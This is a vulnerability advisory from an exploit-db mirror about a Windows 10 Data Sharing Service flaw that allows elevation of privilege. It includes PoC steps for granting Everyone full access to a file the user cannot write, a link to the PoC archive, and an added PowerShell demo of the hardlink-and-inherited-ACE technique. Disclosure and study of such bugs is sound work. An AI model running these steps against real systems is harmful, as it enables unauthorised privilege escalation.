exploit-db-mirror/exploits/windows/local/46160.txt
Offensive Security d63de06c7a DB: 2022-11-10
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

Windows: DSSVC MoveFileInheritSecurity Multiple Issues EoP
Platform: Windows 10 1803 and 1809.
Class: Elevation of Privilege
Security Boundary (per Windows Security Service Criteria): User boundary
NOTE: This is one of multiple issues I'm reporting in the same service. While I've tried to ensure all the bugs are effectively orthogonal to each other, it's possible that fixes for one thing might affect others. I've also not reported every possible problem with the service, as at some point I had to stop. I've not determined if any of these issues could be abusable from a sandbox; most of the issues almost certainly can't be, due to the requirement for arbitrary file symlinks, but it's not impossible.
Summary:
The Data Sharing Service MoveFileInheritSecurity method is broken, leading to EoP.
Description:
The PolicyChecker::MoveFileInheritSecurity method is almost an exact copy of the code from the Storage Service which I exploited in MSRC cases 42121 and 42122. In fact I'd say it's the same code, copied and pasted. It has exactly the same bugs as the Storage Service version, specifically arbitrary file writes, due to the reverting call to MoveFileEx, and arbitrary ACL setting, by placing a hardlinked file in a directory with inheritable ACEs.
This method is called from DSSMoveToSharedFile and DSSMoveFromSharedFile. While those methods do some checking, it's still possible to bypass the checks. This results in the MoveFileInheritSecurity method being called as the SYSTEM user, which results in EoP.
I'm saddened by the fact this wasn't discovered during variant analysis from the Storage Service issues.
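The hardlink-plus-inheritable-ACE primitive described above, as an added example. This is not the advisory's PoC and does not talk to DSSVC: it runs as the current user against files that user creates and owns under $env:TEMP (all paths are assumptions for the demo), so it shows why recomputing inherited security on a moved hardlink rewrites the DACL of the target file, not the escalation itself. In the real bug the service performs the equivalent "inherit security" step as SYSTEM, which is what makes it work against files the user cannot otherwise touch.

```powershell
# Added demonstration, not part of the advisory or its C# PoC. Runs on Windows
# against an NTFS volume (hardlinks need NTFS and must stay on one volume).
$ErrorActionPreference = 'Stop'
$base       = Join-Path $env:TEMP 'inherit-demo'   # assumed scratch location
$victim     = Join-Path $base 'victim.txt'         # stands in for the target file
$inheritDir = Join-Path $base 'inheritable'        # directory the "attacker" controls

New-Item -ItemType Directory -Path $base, $inheritDir -Force | Out-Null
Set-Content -Path $victim -Value 'target contents'

# Step 1: give the directory an inheritable ACE (Everyone = S-1-1-0, FullControl,
# ContainerInherit | ObjectInherit). Any file whose DACL is recomputed against
# this parent picks the ACE up. The SID is used so the demo is locale-independent.
$everyone = [System.Security.Principal.SecurityIdentifier]::new('S-1-1-0')
$ace = [System.Security.AccessControl.FileSystemAccessRule]::new(
    $everyone, 'FullControl', 'ContainerInherit, ObjectInherit', 'None', 'Allow')
$dirAcl = Get-Acl -Path $inheritDir
$dirAcl.AddAccessRule($ace)
Set-Acl -Path $inheritDir -AclObject $dirAcl

# Step 2: create a hardlink to the target. A hardlink is a second name for the
# same file record, so it shares the target's security descriptor.
$link = Join-Path $base 'link.txt'
New-Item -ItemType HardLink -Path $link -Target $victim | Out-Null

# Step 3: move the link into the directory. A plain rename does not recompute
# the DACL, so the "inherit security" step has to be done explicitly: clearing
# DACL protection and persisting makes Windows re-derive the inherited ACEs
# from the new parent.
$movedLink = Join-Path $inheritDir 'link.txt'
Move-Item -Path $link -Destination $movedLink
$fileAcl = Get-Acl -Path $movedLink
$fileAcl.SetAccessRuleProtection($false, $true)   # $false = not protected, inherit from parent
Set-Acl -Path $movedLink -AclObject $fileAcl

# Step 4: the check. Read the DACL through the ORIGINAL path: the inherited
# Everyone:FullControl ACE is present because link and target are one file.
(Get-Acl -Path $victim).Access |
    Where-Object {
        $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value -eq 'S-1-1-0'
    } |
    Format-Table IdentityReference, FileSystemRights, IsInherited -AutoSize

Remove-Item -Path $base -Recurse -Force
```

Run it from an ordinary (non-elevated) PowerShell prompt; the only privilege it needs is ownership of the demo files. Later Windows 10 builds require write access to a file in order to create a hardlink to it, which is one reason the demo targets a file the user owns rather than a system file. The same Step 4 query, pointed at the file passed to the advisory's PoC, is how to confirm the Observed Result below.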
Proof of Concept:
I've provided a PoC as a C# project. It calls DSMoveFromSharedFile to modify the DACL of an arbitrary file, via a hardlink, granting write access to the user.
1) Compile the C# project. It'll need to pull NtApiDotNet from NuGet to build.
2) Execute the PoC, passing on the command line the path to a file the user can't write (but which can be written by SYSTEM).
Expected Result:
The call to move the file fails.
Observed Result:
The call to move the file succeeds and the arbitrary file's DACL now grants the Everyone group full access.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46160.zip